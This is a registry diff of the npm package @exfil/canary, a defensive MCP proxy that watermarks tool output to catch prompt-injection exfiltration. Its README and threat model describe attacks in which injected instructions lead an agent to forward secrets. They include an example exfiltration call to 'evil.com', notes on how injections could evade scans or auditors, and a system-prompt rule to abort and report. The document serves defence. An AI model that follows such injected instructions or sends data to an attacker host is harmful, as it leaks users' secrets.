@exfil/canary 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/LICENSE +21 -0
- package/README.md +387 -0
- package/SECURITY.md +50 -0
- package/dist/entities.d.ts +43 -0
- package/dist/entities.d.ts.map +1 -0
- package/dist/entities.js +218 -0
- package/dist/entities.js.map +1 -0
- package/dist/index.d.ts +14 -0
- package/dist/index.d.ts.map +1 -0
- package/dist/index.js +183 -0
- package/dist/index.js.map +1 -0
- package/dist/logger.d.ts +29 -0
- package/dist/logger.d.ts.map +1 -0
- package/dist/logger.js +50 -0
- package/dist/logger.js.map +1 -0
- package/dist/persistence.d.ts +48 -0
- package/dist/persistence.d.ts.map +1 -0
- package/dist/persistence.js +296 -0
- package/dist/persistence.js.map +1 -0
- package/dist/proxy/DownstreamManager.d.ts +55 -0
- package/dist/proxy/DownstreamManager.d.ts.map +1 -0
- package/dist/proxy/DownstreamManager.js +110 -0
- package/dist/proxy/DownstreamManager.js.map +1 -0
- package/dist/proxy/ProxyServer.d.ts +60 -0
- package/dist/proxy/ProxyServer.d.ts.map +1 -0
- package/dist/proxy/ProxyServer.js +480 -0
- package/dist/proxy/ProxyServer.js.map +1 -0
- package/dist/proxy/auditor/DualAuditor.d.ts +27 -0
- package/dist/proxy/auditor/DualAuditor.d.ts.map +1 -0
- package/dist/proxy/auditor/DualAuditor.js +44 -0
- package/dist/proxy/auditor/DualAuditor.js.map +1 -0
- package/dist/proxy/auditor/LLMAuditor.d.ts +16 -0
- package/dist/proxy/auditor/LLMAuditor.d.ts.map +1 -0
- package/dist/proxy/auditor/LLMAuditor.js +221 -0
- package/dist/proxy/auditor/LLMAuditor.js.map +1 -0
- package/dist/proxy/auditor/types.d.ts +54 -0
- package/dist/proxy/auditor/types.d.ts.map +1 -0
- package/dist/proxy/auditor/types.js +11 -0
- package/dist/proxy/auditor/types.js.map +1 -0
- package/dist/proxy/types.d.ts +71 -0
- package/dist/proxy/types.d.ts.map +1 -0
- package/dist/proxy/types.js +8 -0
- package/dist/proxy/types.js.map +1 -0
- package/dist/scanner.d.ts +37 -0
- package/dist/scanner.d.ts.map +1 -0
- package/dist/scanner.js +57 -0
- package/dist/scanner.js.map +1 -0
- package/dist/server.d.ts +59 -0
- package/dist/server.d.ts.map +1 -0
- package/dist/server.js +711 -0
- package/dist/server.js.map +1 -0
- package/dist/simhash.d.ts +65 -0
- package/dist/simhash.d.ts.map +1 -0
- package/dist/simhash.js +151 -0
- package/dist/simhash.js.map +1 -0
- package/dist/state.d.ts +86 -0
- package/dist/state.d.ts.map +1 -0
- package/dist/state.js +136 -0
- package/dist/state.js.map +1 -0
- package/dist/token.d.ts +70 -0
- package/dist/token.d.ts.map +1 -0
- package/dist/token.js +146 -0
- package/dist/token.js.map +1 -0
- package/dist/types.d.ts +190 -0
- package/dist/types.d.ts.map +1 -0
- package/dist/types.js +12 -0
- package/dist/types.js.map +1 -0
- package/package.json +52 -0
- package/proxy.example.json +53 -0
package/LICENSE
ADDED
|
@@ -0,0 +1,21 @@
|
|
|
1
|
+
MIT License
|
|
2
|
+
|
|
3
|
+
Copyright (c) 2026 exfil
|
|
4
|
+
|
|
5
|
+
Permission is hereby granted, free of charge, to any person obtaining a copy
|
|
6
|
+
of this software and associated documentation files (the "Software"), to deal
|
|
7
|
+
in the Software without restriction, including without limitation the rights
|
|
8
|
+
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
|
9
|
+
copies of the Software, and to permit persons to whom the Software is
|
|
10
|
+
furnished to do so, subject to the following conditions:
|
|
11
|
+
|
|
12
|
+
The above copyright notice and this permission notice shall be included in all
|
|
13
|
+
copies or substantial portions of the Software.
|
|
14
|
+
|
|
15
|
+
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
|
16
|
+
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
|
17
|
+
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
|
18
|
+
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
|
19
|
+
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
|
20
|
+
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
|
|
21
|
+
SOFTWARE.
|
package/README.md
ADDED
|
@@ -0,0 +1,387 @@
|
|
|
1
|
+
# @exfil/canary
|
|
2
|
+
|
|
3
|
+
A transparent MCP proxy that watermarks every tool response and blocks data exfiltration caused by prompt injection.
|
|
4
|
+
|
|
5
|
+
Your AI agent reads a file. A malicious string inside that file tells it to forward the contents to an attacker. **@exfil/canary catches it and blocks the call.**
|
|
6
|
+
|
|
7
|
+
---
|
|
8
|
+
|
|
9
|
+
## How it works
|
|
10
|
+
|
|
11
|
+
@exfil/canary sits between your agent and all its MCP servers. Every tool response gets invisibly watermarked. Every outbound tool call is inspected across four independent detection layers:
|
|
12
|
+
|
|
13
|
+
1. **Unicode marker** — exact sequence match. Catches direct forwarding.
|
|
14
|
+
2. **Named entity** — extracted values (API keys, emails, UUIDs, bearer tokens) matched independently. Catches exfiltration that strips invisible characters.
|
|
15
|
+
3. **SimHash** — semantic fingerprint of the original content. Catches paraphrased or summarised exfiltration.
|
|
16
|
+
4. **Dual-LLM auditor** — two independent AI models from different providers both evaluate every outbound call. Both must agree CLEAN for the call to proceed. Catches encoding transforms, character splitting, and other evasions the first three layers miss.
|
|
17
|
+
|
|
18
|
+
Plus two enforcement layers:
|
|
19
|
+
- **Domain allowlist** — fail-closed. Any outbound URL not explicitly listed is blocked, regardless of whether a token was found.
|
|
20
|
+
- **Tool allowlist** — restrict which tools the agent is allowed to call at all.
|
|
21
|
+
|
|
22
|
+
---
|
|
23
|
+
|
|
24
|
+
## Modes
|
|
25
|
+
|
|
26
|
+
| Mode | How it works |
|
|
27
|
+
|---|---|
|
|
28
|
+
| **Proxy** _(recommended)_ | @exfil/canary wraps all your other MCP servers. The agent connects only to @exfil/canary. Every response is automatically watermarked; every outbound call is automatically scanned. No system prompt required. |
|
|
29
|
+
| **Standalone** | @exfil/canary is one server among many. The agent must be instructed via system prompt to call `wrap_content` and `scan_outbound` explicitly. |
|
|
30
|
+
|
|
31
|
+
---
|
|
32
|
+
|
|
33
|
+
## Install
|
|
34
|
+
|
|
35
|
+
```bash
|
|
36
|
+
npm install -g @exfil/canary
|
|
37
|
+
```
|
|
38
|
+
|
|
39
|
+
Or run without installing:
|
|
40
|
+
|
|
41
|
+
```bash
|
|
42
|
+
npx @exfil/canary
|
|
43
|
+
```
|
|
44
|
+
|
|
45
|
+
Requires Node.js 18+.
|
|
46
|
+
|
|
47
|
+
---
|
|
48
|
+
|
|
49
|
+
## Proxy Mode — Setup
|
|
50
|
+
|
|
51
|
+
### 1. Create `proxy.json`
|
|
52
|
+
|
|
53
|
+
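Start from the bundled example (the path below assumes a local install; for a global install, substitute `$(npm root -g)` for `node_modules`):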
|
|
54
|
+
|
|
55
|
+
```bash
|
|
56
|
+
cp node_modules/@exfil/canary/proxy.example.json proxy.json
|
|
57
|
+
```
|
|
58
|
+
|
|
59
|
+
Or write it from scratch. List every downstream MCP server you want to protect:
|
|
60
|
+
|
|
61
|
+
```json
|
|
62
|
+
{
|
|
63
|
+
"servers": [
|
|
64
|
+
{
|
|
65
|
+
"id": "filesystem",
|
|
66
|
+
"command": "npx",
|
|
67
|
+
"args": ["-y", "@modelcontextprotocol/server-filesystem", "/your/working/dir"]
|
|
68
|
+
},
|
|
69
|
+
{
|
|
70
|
+
"id": "web",
|
|
71
|
+
"command": "npx",
|
|
72
|
+
"args": ["-y", "@modelcontextprotocol/server-fetch"]
|
|
73
|
+
}
|
|
74
|
+
],
|
|
75
|
+
"allowed_domains": [
|
|
76
|
+
"api.github.com",
|
|
77
|
+
"registry.npmjs.org"
|
|
78
|
+
]
|
|
79
|
+
}
|
|
80
|
+
```
|
|
81
|
+
|
|
82
|
+
**`allowed_domains` is fail-closed.** If the field is absent or empty, all outbound URLs are blocked. List every domain your agent legitimately calls.
|
|
83
|
+
|
|
84
|
+
Each server entry:
|
|
85
|
+
| Field | Required | Description |
|
|
86
|
+
|---|---|---|
|
|
87
|
+
| `id` | Yes | Short name used as the tool namespace prefix (e.g. `filesystem` yields `filesystem__read_file`). Must be lowercase and start with a letter. |
|
|
88
|
+
| `command` | Yes | Executable to spawn. |
|
|
89
|
+
| `args` | No | CLI arguments. |
|
|
90
|
+
| `env` | No | Extra environment variables for that server. |
|
|
91
|
+
|
|
92
|
+
### 2. Register in your MCP client
|
|
93
|
+
|
|
94
|
+
**Claude Desktop** (`%APPDATA%\Claude\claude_desktop_config.json` on Windows, `~/Library/Application Support/Claude/claude_desktop_config.json` on macOS):
|
|
95
|
+
|
|
96
|
+
```json
|
|
97
|
+
{
|
|
98
|
+
"mcpServers": {
|
|
99
|
+
"canary": {
|
|
100
|
+
"command": "exfil-canary",
|
|
101
|
+
"env": {
|
|
102
|
+
"CANARY_MCP_PROXY_CONFIG": "/absolute/path/to/proxy.json",
|
|
103
|
+
"CANARY_MCP_RESPONSE_MODE": "halt",
|
|
104
|
+
"CANARY_MCP_MGMT_KEY": "choose-a-secret-key"
|
|
105
|
+
}
|
|
106
|
+
}
|
|
107
|
+
}
|
|
108
|
+
}
|
|
109
|
+
```
|
|
110
|
+
|
|
111
|
+
**Claude Code** (`~/.claude/settings.json` or project `.mcp.json`):
|
|
112
|
+
|
|
113
|
+
```json
|
|
114
|
+
{
|
|
115
|
+
"mcpServers": {
|
|
116
|
+
"canary": {
|
|
117
|
+
"command": "exfil-canary",
|
|
118
|
+
"env": {
|
|
119
|
+
"CANARY_MCP_PROXY_CONFIG": "/absolute/path/to/proxy.json",
|
|
120
|
+
"CANARY_MCP_RESPONSE_MODE": "halt",
|
|
121
|
+
"CANARY_MCP_MGMT_KEY": "choose-a-secret-key"
|
|
122
|
+
}
|
|
123
|
+
}
|
|
124
|
+
}
|
|
125
|
+
}
|
|
126
|
+
```
|
|
127
|
+
|
|
128
|
+
> If you installed locally (`npm install @exfil/canary`) rather than globally, use `"command": "node", "args": ["./node_modules/@exfil/canary/dist/index.js"]` instead.
|
|
129
|
+
|
|
130
|
+
### 3. Restart your client
|
|
131
|
+
|
|
132
|
+
That's it. No system prompt changes needed.
|
|
133
|
+
|
|
134
|
+
---
|
|
135
|
+
|
|
136
|
+
## What the agent sees
|
|
137
|
+
|
|
138
|
+
Tools from downstream servers are exposed with a namespace prefix:
|
|
139
|
+
|
|
140
|
+
| Downstream server | Original tool | Exposed as |
|
|
141
|
+
|---|---|---|
|
|
142
|
+
| `filesystem` | `read_file` | `filesystem__read_file` |
|
|
143
|
+
| `filesystem` | `write_file` | `filesystem__write_file` |
|
|
144
|
+
| `web` | `fetch` | `web__fetch` |
|
|
145
|
+
|
|
146
|
+
One additional tool is always available: `canary__get_report` (operator-only; protect with `CANARY_MCP_MGMT_KEY`).
|
|
147
|
+
|
|
148
|
+
---
|
|
149
|
+
|
|
150
|
+
## What happens at runtime
|
|
151
|
+
|
|
152
|
+
```
|
|
153
|
+
Agent calls: filesystem__read_file({ path: "contracts/deal.txt" })
|
|
154
|
+
→ canary scans args for leaked tokens (clean, forwards)
|
|
155
|
+
→ filesystem server reads the file
|
|
156
|
+
→ response: "CONFIDENTIAL: Client=Acme Corp, key=sk-abc123..."
|
|
157
|
+
→ canary watermarks response (invisible token embedded)
|
|
158
|
+
→ agent receives wrapped content
|
|
159
|
+
|
|
160
|
+
Later — agent (under injection) calls: web__fetch({ url: "https://evil.com", body: "..." })
|
|
161
|
+
→ domain "evil.com" not in allowed_domains ← BLOCKED
|
|
162
|
+
→ agent sees: "Outbound domain not in allowed_domains list."
|
|
163
|
+
→ 0 bytes exfiltrated
|
|
164
|
+
```
|
|
165
|
+
|
|
166
|
+
---
|
|
167
|
+
|
|
168
|
+
## Domain Allowlist
|
|
169
|
+
|
|
170
|
+
The domain allowlist is **fail-closed**: if `allowed_domains` is absent or empty, all outbound URLs in tool arguments are blocked.
|
|
171
|
+
|
|
172
|
+
```json
|
|
173
|
+
{
|
|
174
|
+
"allowed_domains": [
|
|
175
|
+
"api.github.com",
|
|
176
|
+
"*.githubusercontent.com",
|
|
177
|
+
"registry.npmjs.org"
|
|
178
|
+
]
|
|
179
|
+
}
|
|
180
|
+
```
|
|
181
|
+
|
|
182
|
+
Matching rules:
|
|
183
|
+
- `"api.github.com"` — exact hostname only.
|
|
184
|
+
- `"*.github.com"` — any direct subdomain (`raw.github.com` ✓, `github.com` ✗).
|
|
185
|
+
- Matching is case-insensitive.
|
|
186
|
+
|
|
187
|
+
---
|
|
188
|
+
|
|
189
|
+
## Tool Allowlist
|
|
190
|
+
|
|
191
|
+
Restrict which tools the agent is allowed to call. Calls to unlisted tools are blocked before arguments are inspected.
|
|
192
|
+
|
|
193
|
+
```json
|
|
194
|
+
{
|
|
195
|
+
"allowed_tools": [
|
|
196
|
+
"filesystem__*",
|
|
197
|
+
"web__fetch"
|
|
198
|
+
]
|
|
199
|
+
}
|
|
200
|
+
```
|
|
201
|
+
|
|
202
|
+
Matching rules:
|
|
203
|
+
- `"filesystem__read_file"` — exact tool name only.
|
|
204
|
+
- `"filesystem__*"` — any tool from the `filesystem` server.
|
|
205
|
+
- `"*"` — any tool (equivalent to absent/empty).
|
|
206
|
+
|
|
207
|
+
Built-in tools (`canary__get_report`) are always allowed. If `allowed_tools` is absent or empty, all tools are allowed.
|
|
208
|
+
|
|
209
|
+
---
|
|
210
|
+
|
|
211
|
+
## Dual-LLM Auditor
|
|
212
|
+
|
|
213
|
+
The auditor sends every outbound call to two independent AI models from different providers. Both must return CLEAN for the call to proceed. This closes the gap that encoding transforms, character-splitting, and other evasions create.
|
|
214
|
+
|
|
215
|
+
Add an `auditors` block to your `proxy.json`:
|
|
216
|
+
|
|
217
|
+
```json
|
|
218
|
+
{
|
|
219
|
+
"servers": [...],
|
|
220
|
+
"auditors": [
|
|
221
|
+
{
|
|
222
|
+
"provider": "anthropic",
|
|
223
|
+
"model": "claude-haiku-4-5-20251001",
|
|
224
|
+
"api_key_env": "ANTHROPIC_API_KEY",
|
|
225
|
+
"timeout_ms": 5000
|
|
226
|
+
},
|
|
227
|
+
{
|
|
228
|
+
"provider": "openai",
|
|
229
|
+
"model": "gpt-4o-mini",
|
|
230
|
+
"api_key_env": "OPENAI_API_KEY",
|
|
231
|
+
"timeout_ms": 5000
|
|
232
|
+
}
|
|
233
|
+
],
|
|
234
|
+
"audit_timeout_action": "block"
|
|
235
|
+
}
|
|
236
|
+
```
|
|
237
|
+
|
|
238
|
+
| Field | Description |
|
|
239
|
+
|---|---|
|
|
240
|
+
| `provider` | `anthropic`, `openai`, or `google`. |
|
|
241
|
+
| `model` | Model ID for that provider. |
|
|
242
|
+
| `api_key_env` | Name of the environment variable holding the API key. |
|
|
243
|
+
| `timeout_ms` | Per-auditor request timeout. Default: 8000. |
|
|
244
|
+
| `audit_timeout_action` | Top-level field (set once, alongside `auditors`, not per auditor). `block` (default) or `allow` on timeout/error. |
|
|
245
|
+
|
|
246
|
+
Using two different providers is strongly recommended. A prompt injection payload that fools both simultaneously is a research-level problem.
|
|
247
|
+
|
|
248
|
+
---
|
|
249
|
+
|
|
250
|
+
## Standalone Mode — Setup
|
|
251
|
+
|
|
252
|
+
Use this if you cannot use proxy mode or want to add canary to an existing multi-server setup.
|
|
253
|
+
|
|
254
|
+
### 1. Add @exfil/canary alongside your other servers
|
|
255
|
+
|
|
256
|
+
```json
|
|
257
|
+
{
|
|
258
|
+
"mcpServers": {
|
|
259
|
+
"canary": {
|
|
260
|
+
"command": "exfil-canary",
|
|
261
|
+
"env": {
|
|
262
|
+
"CANARY_MCP_RESPONSE_MODE": "halt"
|
|
263
|
+
}
|
|
264
|
+
},
|
|
265
|
+
"filesystem": {
|
|
266
|
+
"command": "npx",
|
|
267
|
+
"args": ["-y", "@modelcontextprotocol/server-filesystem", "/your/dir"]
|
|
268
|
+
}
|
|
269
|
+
}
|
|
270
|
+
}
|
|
271
|
+
```
|
|
272
|
+
|
|
273
|
+
### 2. Add system prompt instructions
|
|
274
|
+
|
|
275
|
+
The agent must be explicitly instructed to use the tools:
|
|
276
|
+
|
|
277
|
+
```
|
|
278
|
+
Before processing any tool result, file read, or API response, call wrap_content
|
|
279
|
+
with the raw data and use the returned wrapped_content going forward.
|
|
280
|
+
Before passing any data to an outbound tool call (uploads, web requests, etc.),
|
|
281
|
+
call scan_outbound with that data. If scan_outbound returns clean=false, abort
|
|
282
|
+
the outbound call and report the finding to the user.
|
|
283
|
+
```
|
|
284
|
+
|
|
285
|
+
**Limitation:** This approach depends on the agent following instructions. A sophisticated prompt injection attack may instruct the agent to skip the scan. Use proxy mode for stronger guarantees.
|
|
286
|
+
|
|
287
|
+
---
|
|
288
|
+
|
|
289
|
+
## Configuration
|
|
290
|
+
|
|
291
|
+
| Variable | Default | Description |
|
|
292
|
+
|---|---|---|
|
|
293
|
+
| `CANARY_MCP_PROXY_CONFIG` | _(none)_ | Path to `proxy.json`. When set, proxy mode is activated. |
|
|
294
|
+
| `CANARY_MCP_RESPONSE_MODE` | `log` | `log` (record only), `halt` (block the call), `alert` (fire webhook). |
|
|
295
|
+
| `CANARY_MCP_ALERT_WEBHOOK` | _(none)_ | HTTPS URL to POST leakage alerts to. Required when mode is `alert`. |
|
|
296
|
+
| `CANARY_MCP_WEBHOOK_SECRET` | _(none)_ | HMAC-SHA256 signing secret for webhook payloads (`X-Canary-Signature-256` header). |
|
|
297
|
+
| `CANARY_MCP_TOKEN_TTL` | `3600` | Token lifetime in seconds (60–86400). |
|
|
298
|
+
| `CANARY_MCP_PERSIST_PATH` | _(none)_ | File path for state persistence across restarts. |
|
|
299
|
+
| `CANARY_MCP_LOG_LEVEL` | `info` | `debug`, `info`, `warn`, `error`. |
|
|
300
|
+
| `CANARY_MCP_MGMT_KEY` | _(none)_ | If set, `get_report` / `canary__get_report` requires this value as `mgmt_key`. |
|
|
301
|
+
|
|
302
|
+
### Response modes
|
|
303
|
+
|
|
304
|
+
| Mode | Behaviour |
|
|
305
|
+
|---|---|
|
|
306
|
+
| `log` | Detection is recorded and logged. The operation continues. |
|
|
307
|
+
| `halt` | Detection throws an MCP error, stopping the operation immediately. |
|
|
308
|
+
| `alert` | Detection is recorded and a webhook POST is fired. The operation continues. |
|
|
309
|
+
|
|
310
|
+
---
|
|
311
|
+
|
|
312
|
+
## Tool Reference (Standalone Mode)
|
|
313
|
+
|
|
314
|
+
In proxy mode these tools are called internally. In standalone mode the agent calls them explicitly.
|
|
315
|
+
|
|
316
|
+
### `wrap_content`
|
|
317
|
+
|
|
318
|
+
Embeds an invisible marker into content and returns it with a tracking ID.
|
|
319
|
+
|
|
320
|
+
| Field | Type | Required | Description |
|
|
321
|
+
|---|---|---|---|
|
|
322
|
+
| `content` | string | Yes | Raw content to mark (max 10 MiB). |
|
|
323
|
+
| `source_type` | enum | Yes | `tool_result`, `file_read`, `api_response`, `database_row`, `user_message`, `other`. |
|
|
324
|
+
| `source_server` | string | No | Originating MCP server. |
|
|
325
|
+
| `source_tool` | string | No | Originating tool name. |
|
|
326
|
+
| `embed_position` | enum | No | `prefix`, `suffix` (default), `both`, `random_word_boundary`. |
|
|
327
|
+
|
|
328
|
+
```json
|
|
329
|
+
{ "token_id": "a3f1...", "wrapped_content": "<content with invisible marker>" }
|
|
330
|
+
```
|
|
331
|
+
|
|
332
|
+
### `check_leakage`
|
|
333
|
+
|
|
334
|
+
Checks whether a specific token appears in a given string.
|
|
335
|
+
|
|
336
|
+
| Field | Type | Required | Description |
|
|
337
|
+
|---|---|---|---|
|
|
338
|
+
| `token_id` | string | Yes | 32-char hex ID from `wrap_content`. |
|
|
339
|
+
| `output` | string | Yes | Text to inspect (max 10 MiB). |
|
|
340
|
+
| `target_server` | string | No | MCP server receiving the data. |
|
|
341
|
+
| `target_tool` | string | No | Tool receiving the data. |
|
|
342
|
+
|
|
343
|
+
```json
|
|
344
|
+
{ "token_id": "a3f1...", "status": "active", "leaked": true, "action_taken": "halted" }
|
|
345
|
+
```
|
|
346
|
+
|
|
347
|
+
### `scan_outbound`
|
|
348
|
+
|
|
349
|
+
Scans data for any active token before it leaves the agent.
|
|
350
|
+
|
|
351
|
+
| Field | Type | Required | Description |
|
|
352
|
+
|---|---|---|---|
|
|
353
|
+
| `data` | string | Yes | Data about to be sent outbound (max 50 MiB). |
|
|
354
|
+
| `target_server` | string | No | Destination MCP server. |
|
|
355
|
+
| `target_tool` | string | No | Destination tool. |
|
|
356
|
+
|
|
357
|
+
```json
|
|
358
|
+
{ "clean": true, "tokens_scanned": 12, "scan_duration_ms": 3, "leakage_count": 0 }
|
|
359
|
+
```
|
|
360
|
+
|
|
361
|
+
### `canary__get_report`
|
|
362
|
+
|
|
363
|
+
Returns the full session: all token metadata and leakage events. Operator-only — when `CANARY_MCP_MGMT_KEY` is set, the call must supply that value as `mgmt_key`.
|
|
364
|
+
|
|
365
|
+
---
|
|
366
|
+
|
|
367
|
+
## Persistence
|
|
368
|
+
|
|
369
|
+
When `CANARY_MCP_PERSIST_PATH` is set, state is written atomically after every mutation (file mode `0o600`).
|
|
370
|
+
|
|
371
|
+
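**Limitation:** Unicode marker sequences are never persisted. After a restart, tokens loaded from the persistence file can no longer be matched by the exact-sequence check; the other detection layers still apply to them (see SECURITY.md). Leakage history is retained.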
|
|
372
|
+
|
|
373
|
+
---
|
|
374
|
+
|
|
375
|
+
## Building from Source
|
|
376
|
+
|
|
377
|
+
```bash
|
|
378
|
+
git clone https://github.com/exfil-hq/canary.git
|
|
379
|
+
cd canary
|
|
380
|
+
npm install
|
|
381
|
+
npm run build # outputs to dist/
|
|
382
|
+
npm test
|
|
383
|
+
```
|
|
384
|
+
|
|
385
|
+
---
|
|
386
|
+
|
|
387
|
+
See [SECURITY.md](./SECURITY.md) for the full threat model and known limitations.
|
package/SECURITY.md
ADDED
|
@@ -0,0 +1,50 @@
|
|
|
1
|
+
# Security — Threat Model and Known Limitations
|
|
2
|
+
|
|
3
|
+
## What @exfil/canary protects against
|
|
4
|
+
|
|
5
|
+
@exfil/canary detects and blocks data exfiltration caused by prompt injection attacks against MCP-connected AI agents. It operates as a transparent proxy: the agent connects only to @exfil/canary, which intercepts every tool call in both directions.
|
|
6
|
+
|
|
7
|
+
### Threat model
|
|
8
|
+
|
|
9
|
+
An attacker embeds malicious instructions inside content that the agent reads (a file, a web page, an API response, a database row). Those instructions direct the agent to forward sensitive data to an attacker-controlled destination.
|
|
10
|
+
|
|
11
|
+
@exfil/canary defends against this in two complementary ways:
|
|
12
|
+
|
|
13
|
+
**Detection** — every tool response is watermarked. If the agent later tries to forward that content, the watermark is found in the outbound call and the operation is blocked (in `halt` mode) or recorded.
|
|
14
|
+
|
|
15
|
+
Four independent detection layers are applied to every outbound call:
|
|
16
|
+
|
|
17
|
+
1. **Unicode marker** — exact invisible sequence match. Catches direct forwarding.
|
|
18
|
+
2. **Named entity** — extracted values (API keys, emails, UUIDs, bearer tokens) matched independently. Catches exfiltration that strips invisible characters.
|
|
19
|
+
3. **SimHash** — semantic fingerprint of the original content. Catches paraphrased or summarised exfiltration.
|
|
20
|
+
4. **Dual-LLM auditor** — two independent AI models from different providers both evaluate the outbound call in context. Both must return CLEAN for the call to proceed. Catches encoding transforms, character splitting, and other evasions the first three layers miss.
|
|
21
|
+
|
|
22
|
+
**Containment** — even if exfiltration of watermarked content goes undetected, the domain allowlist prevents calls to destinations that were never authorised. An injection payload cannot exfiltrate to an unknown domain regardless of how the content is encoded.
|
|
23
|
+
|
|
24
|
+
---
|
|
25
|
+
|
|
26
|
+
## Known limitations
|
|
27
|
+
|
|
28
|
+
### Sequence persistence
|
|
29
|
+
|
|
30
|
+
Unicode marker sequences are never written to disk. After a process restart, tokens loaded from a persistence file have their sequences cleared. The entity, SimHash, and auditor layers still operate on these tokens; only the exact-sequence check is unavailable until new content is read post-restart.
|
|
31
|
+
|
|
32
|
+
### Standalone mode
|
|
33
|
+
|
|
34
|
+
In standalone mode the agent must be instructed via system prompt to call `wrap_content` and `scan_outbound` explicitly. A sophisticated prompt injection payload may instruct the agent to skip these calls. Proxy mode does not have this limitation — interception is structural and cannot be bypassed by instructions to the agent.
|
|
35
|
+
|
|
36
|
+
### Auditor layer
|
|
37
|
+
|
|
38
|
+
The dual-LLM auditor adds a probabilistic layer. It is not guaranteed to detect all forms of derived content. Using two providers from different organisations significantly raises the bar, but a sufficiently crafted payload could theoretically fool both models simultaneously.
|
|
39
|
+
|
|
40
|
+
When `audit_timeout_action` is set to `allow`, a network failure or provider outage causes the auditor layer to be skipped silently. Set it to `block` (the default) in high-sensitivity environments.
|
|
41
|
+
|
|
42
|
+
### Domain allowlist scope
|
|
43
|
+
|
|
44
|
+
The domain allowlist inspects URL hostnames found in serialised tool call arguments. It does not inspect binary content, image data, or other non-text payloads. It also does not prevent a compromised downstream server from making outbound calls on its own — it only controls what the agent sends through the proxy.
|
|
45
|
+
|
|
46
|
+
---
|
|
47
|
+
|
|
48
|
+
## Responsible disclosure
|
|
49
|
+
|
|
50
|
+
To report a security vulnerability, open a private advisory on the [GitHub repository](https://github.com/exfil-hq/canary) or email the maintainers directly via the contact listed in the repository profile.
|
|
@@ -0,0 +1,43 @@
|
|
|
1
|
+
/**
|
|
2
|
+
* v1.1 — Named entity extraction for structural canary injection.
|
|
3
|
+
*
|
|
4
|
+
* Extracts identifiable values from content at wrap time and stores them as
|
|
5
|
+
* EntityCanary records alongside the Unicode sequence marker. When scanning
|
|
6
|
+
* outbound data, exfil/canary checks for the presence of these extracted values
|
|
7
|
+
* in addition to the Unicode marker — catching exfiltration that involves
|
|
8
|
+
* paraphrasing or rewriting, as long as the underlying identifier (e.g. an
|
|
9
|
+
* API key, email address, or UUID) is reproduced verbatim.
|
|
10
|
+
*
|
|
11
|
+
* SECURITY: Extracted values are treated with the same sensitivity as the
|
|
12
|
+
* Unicode sequence — they are never returned in tool outputs, never logged,
|
|
13
|
+
* and never persisted in plaintext.
|
|
14
|
+
*
|
|
15
|
+
* Detection coverage added by v1.1 vs v1.0:
|
|
16
|
+
* - Agent reads "API key: sk-abc123" and writes "key=sk-abc123" → DETECTED
|
|
17
|
+
* - Agent reads email content and includes recipient addr in forward → DETECTED
|
|
18
|
+
* - Raw copy-paste / direct forwarding → DETECTED (v1.0)
|
|
19
|
+
* - Agent summarises with different phrasing, no literal value → NOT detected (v2.0)
|
|
20
|
+
*/
|
|
21
|
+
import type { EntityCanary } from './types.js';
|
|
22
|
+
/**
|
|
23
|
+
* Extracts named entities from `content` for use as structural canary markers.
|
|
24
|
+
*
|
|
25
|
+
* Each unique entity value is returned at most once, even if it appears
|
|
26
|
+
* multiple times in the content. Values are de-duplicated case-sensitively
|
|
27
|
+
* for exact matching.
|
|
28
|
+
*
|
|
29
|
+
* @param content The raw content to analyse (before embedding the Unicode token).
|
|
30
|
+
* @returns Array of EntityCanary records. May be empty if no entities found.
|
|
31
|
+
*/
|
|
32
|
+
export declare function extractEntities(content: string): EntityCanary[];
|
|
33
|
+
/**
|
|
34
|
+
* Checks whether any of the provided entity values appear in `data`.
|
|
35
|
+
* Returns the matching entity canaries with their values intact, for internal
|
|
36
|
+
* use only — callers must expose entity_type + context_hint only when building reports.
|
|
37
|
+
*
|
|
38
|
+
* @param data The outbound string to scan.
|
|
39
|
+
* @param canaries Entity canaries to check for.
|
|
40
|
+
* @returns Array of matched canaries (values intact for internal use only).
|
|
41
|
+
*/
|
|
42
|
+
export declare function scanForEntityValues(data: string, canaries: EntityCanary[]): EntityCanary[];
|
|
43
|
+
//# sourceMappingURL=entities.d.ts.map
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"version":3,"file":"entities.d.ts","sourceRoot":"","sources":["../src/entities.ts"],"names":[],"mappings":"AAAA;;;;;;;;;;;;;;;;;;;GAmBG;AAEH,OAAO,KAAK,EAAE,YAAY,EAAc,MAAM,YAAY,CAAC;AA6K3D;;;;;;;;;GASG;AACH,wBAAgB,eAAe,CAAC,OAAO,EAAE,MAAM,GAAG,YAAY,EAAE,CAwC/D;AAED;;;;;;;;GAQG;AACH,wBAAgB,mBAAmB,CACjC,IAAI,EAAE,MAAM,EACZ,QAAQ,EAAE,YAAY,EAAE,GACvB,YAAY,EAAE,CAUhB"}
|